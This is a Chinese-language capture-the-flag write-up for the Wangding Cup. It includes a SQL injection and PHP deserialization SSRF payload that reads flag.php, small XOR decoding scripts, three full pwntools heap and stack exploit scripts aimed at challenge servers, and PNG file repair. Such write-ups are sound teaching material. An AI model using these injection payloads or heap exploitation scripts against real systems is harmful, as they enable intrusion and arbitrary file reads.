網(wǎng)鼎杯
這次還行很開心
挺滿足
題目列表
web
首先訪問robots.txt
存在備份泄露愧薛,把user.php.bak下載下來
<?php
class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";
public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
view.php的no參數(shù)是可以注入的
payload:/view.php?no=-6 unIon/**/select 1,table_name,3,4 from information_schema.tables where table_schema=database()
可以注入出表名
也可以注入出列名
from information_schema.columns where table_schema=database() limit 0,3分別是
no顷牌,username荚恶,password隆嗅,data查看data的數(shù)據(jù)會發(fā)現(xiàn)是一個(gè)序列化的數(shù)據(jù)
他沒有查找到東西就沒有調(diào)用
getBlogContents()而且用了php的
unserialize()函數(shù)所以我們可以通過反序列化來實(shí)現(xiàn)ssrf讀取任意文件
/view.php?no=1 unIon/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:6:"ckj123";s:3:"age";i:111111;s:4:"blog";s:29:"file:///var/www/html/flag.php";} '
re
Advance
d語言
..講道理我是猜的 給的那一串東西decode hex后為這樣一個(gè)字符串:
“K@LKVHr[DXEsLsYI@\AMYIr\EIZQ”
然后猜異或就出來了..
腳本
stringA = r'K@LKVHr[DXEsLsYI@\AMYIr\EIZQ'
flag = ''
for i in range(len(stringA)):
if(i % 2 == 0):
flag += chr(ord(stringA[i]) ^ 45)
else:
flag += chr(ord(stringA[i]) ^ 44)
print(flag)
Beijing
string = 'aginbefjml{z}_W'
num = [6,9,0,1,0xa,0,8,0,0xb,2,3,1,0xd,4,5,2,7,2,3,1,0xc]
flag = ''
for i in num:
flag += string[i]
print(flag)
flag{amazing_beijing}
pwn
GUESS
fork出的進(jìn)程所以不怕崩棚潦,直接通過___stack_chk_fail()打印出libc地址,然后通過libc里的環(huán)境變量打印出棧地址疮跑,最后打印出棧里的flag组贺,剛好三次
#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
local = 0
if local:
cn = process('./guess')
bin = ELF('./guess')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
else:
cn = remote('106.75.90.160',9999)
bin = ELF('./guess')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def z(a=''):
gdb.attach(cn,a)
if a == '':
raw_input()
cn.sendline(p64(0x602020)*200)
cn.recvuntil('***: ')
lbase = u64(cn.recvuntil('\x7f').ljust(8,'\x00')) - libc.sym['puts']
print('lbase:' + hex(lbase))
env = lbase + libc.sym['environ']
cn.sendline(p64(env)*200)
cn.recvuntil('***: ')
sbase = u64(cn.recvuntil('\x7f').ljust(8,'\x00')) - 0x168
print('sbase:' + hex(sbase))
cn.sendline(p64(sbase)*200)
#z('c')
cn.interactive()
blind
有fastbin atk能任意地址寫但沒有l(wèi)eak,而且got表也不可寫祖娘,但能偽造bss上的文件指針失尖,使用自己偽造的虛表執(zhí)行g(shù)etshell函數(shù)
from pwn import *
context.log_level='debug'
p=remote('106.75.20.44',9999)
#p=process('./blind')
p.recv()
def pr():
p.recvuntil('ice:')
def new(index,content,sh=0):
p.send('1\n')
p.recvuntil('Index:')
p.send(str(index))
p.recvuntil(':')
p.sendline(content)
if sh==1:
p.interactive()
pr()
def change(index,content,sh=0):
p.send('2\n')
p.recvuntil('Index:')
p.send(str(index))
p.recvuntil(':')
p.sendline(content)
if sh==1:
p.interactive()
pr()
def free(index):
p.send('3\n')
p.recvuntil('Index:')
p.send(str(index))
pr()
def write(addr,v,sh=0):
change(0,p64(0x602060)+p64(addr))
change(1,v,sh)
puts=0x601FA0
ptr=0x602060
target=0x60201d
shell=0x4008E3
new(0,"asdasd")
free(0)
change(0,p64(target))
new(5,p64(shell)*10)
new(3,'\x00'*3+'\x00'*0x30+p64(0x602060))
write(0x602100,p64(0xfbada887)+p64(0)*7+p64(1))
write(0x6021d8,p64(0x602200))
write(0x602200, p64(shell)*8)
write(0x602020,p64(0x602100),1)
p.interactive()
babyheap
fastbin attack leak出heap地址,
unlink 改bss(次數(shù)應(yīng)該不夠渐苏,去修改那個(gè)計(jì)數(shù)器能無限續(xù))
#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
local = 0
if local:
cn = process('./babyheap')
bin = ELF('./babyheap',checksec=False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
else:
cn = remote('106.75.67.115', 9999)
bin = ELF('./babyheap',checksec=False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
pass
def z(a=''):
gdb.attach(cn,a)
if a == '':
raw_input()
def add(idx,con):
cn.sendlineafter('Choice:','1')
cn.sendlineafter(':',str(idx))
cn.sendlineafter(':',con)
def edit(idx,con):
cn.sendlineafter('Choice:','2')
cn.sendlineafter(':',str(idx))
cn.sendlineafter(':',con)
def dele(idx):
cn.sendlineafter('Choice:','4')
cn.sendlineafter(':',str(idx))
def show(idx):
cn.sendlineafter('Choice:','3')
cn.sendlineafter(':',str(idx))
add(0,p64(0x30)*3+'\x30')
add(1,'asd')
add(2,'asd')
add(3,'asd')
add(4,p64(0)+p64(0x21))
dele(2)
dele(3)
show(3)
hbase=u64(cn.recvuntil('\n')[:-1].ljust(8,'\x00'))-0x60
success(hex(hbase))
edit(3,p64(hbase+0x20))
dele(0)
add(9,p64(0)+p64(0x21)+p64(0x30)+p32(0x30))
# z()
add(6,'/bin/sh')
add(7,p64(0x20)+p64(0x90))
dele(0)
add(8,p64(0)+p64(0x21)+p64(0x0602060-0x18+9*8)+p32(0x0602060-0x10+9*8))
dele(1)
# z('b*0x0000000000400C86\nc')
edit(9,p64(0x000000000602098)*2+p64(0x0000000006020B0)+p32(bin.got['free']))
show(9)
lbase=u64(cn.recvuntil('\n')[:-1].ljust(8,'\x00'))-libc.sym['free']
success(hex(lbase))
# z('b*0x0000000000400B1D\nc')
edit(8,p64(0))
edit(7,p64(0x000000000602098)+p64(0x0000000006020B0)+p64(lbase+libc.sym['__free_hook'])[:-1])
edit(8,p64(0))
edit(9,p64(lbase+libc.sym['system'])[:-1])
# z('b free\nc')
dele(3)
# z()
cn.interactive()
misc
clip
下載下來之后有這兩個(gè)文件
告訴我們要切割
用010editor打開damaged.disk
會在里面找到兩個(gè)
然后將這兩張png分別拿出來補(bǔ)齊文件頭和文件尾
前面加上
89 50 4E 47 0D 0A 1A 0A
后面加上
00 00 00 00 49 45 4E 44 AE 42 60 82
就可以得到兩張圖片了
然后將兩張圖片切成數(shù)個(gè)圖拼起來得到flag
